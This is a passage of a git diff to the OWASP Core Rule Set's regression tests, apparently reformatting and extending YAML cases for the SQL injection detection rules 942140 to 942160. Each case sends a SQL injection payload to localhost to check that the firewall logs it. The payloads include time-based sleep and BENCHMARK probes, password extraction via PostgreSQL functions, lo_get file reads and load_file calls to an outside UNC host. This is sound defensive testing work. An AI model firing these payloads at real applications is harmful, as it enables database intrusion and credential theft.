User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "DATABASE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "schema_name" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "information_schema" - version: HTTP/1.0 - output: - log_contains: id "942140" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index 25c3e10692..3c169b446f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -1,329 +1,329 @@ --- - meta: - author: "Christian Folini" - description: Various SQL injection tests - enabled: true - name: 942150.yaml - tests: - - - test_title: 942150-1 +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942150.yaml +tests: + - test_title: 942150-1 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\x22=sleep(12)=\x22" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-2 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-3 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-4 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\x22undefined\x22){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-5 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-6 - desc: "Advanced SQL injection" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-6 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-7 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/config.txt' (select load_file('\x5c\x5c\x5c\x5cunittests.coreruleset.org\x5c\x5czow')) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-9 - desc: "Simple SQL injection" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-8 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-9 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-10 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-11 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cunitests.corerule'||'set.org\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5chvs'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-14 - desc: "Advanced SQL injection" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-12 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-13 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-14 desc: "Advanced injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test\x22+eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))+\x22" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-18 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-15 desc: "Advanced injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test\x22+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\x22" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-19 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-16 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x5cfoobar.txt\x22 or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-17 + desc: "SQLite 'json' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-18 + desc: "SQLite 'json_valid' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-19 + desc: "SQLite 'glob' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log_contains: id "942150" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml new file mode 100644 index 0000000000..c749e8d8bd --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -0,0 +1,190 @@ +--- +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942151.yaml +tests: + - test_title: 942151-1 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-3 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-4 + desc: "Simple injection using 'fetch_in_set'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-5 + desc: "SQL injection using 'likelihood' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-6 + desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-7 + desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-8 + desc: "SQL injection using PostgreSQL starts_with() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-9 + desc: "SQL injection using PostgreSQL jsonb_pretty() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-10 + desc: "SQL injection using PostgreSQL json_build_object() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-11 + desc: "SQL injection using unistr() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml new file mode 100644 index 0000000000..097ed23fde --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml @@ -0,0 +1,55 @@ +--- +meta: + author: "Franziska Bühler" + description: Various SQL injection tests + enabled: true + name: 942152.yaml +tests: + - test_title: 942152-1 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_title: 942152-2 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_title: 942152-3 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index 3848e7fcff..e8013ec5f7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -1,159 +1,175 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942160.yaml - tests: - - - test_title: 942160-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942160.yaml +tests: + - test_title: 942160-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=BENCHMARK(1000000, md5\x22 AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - 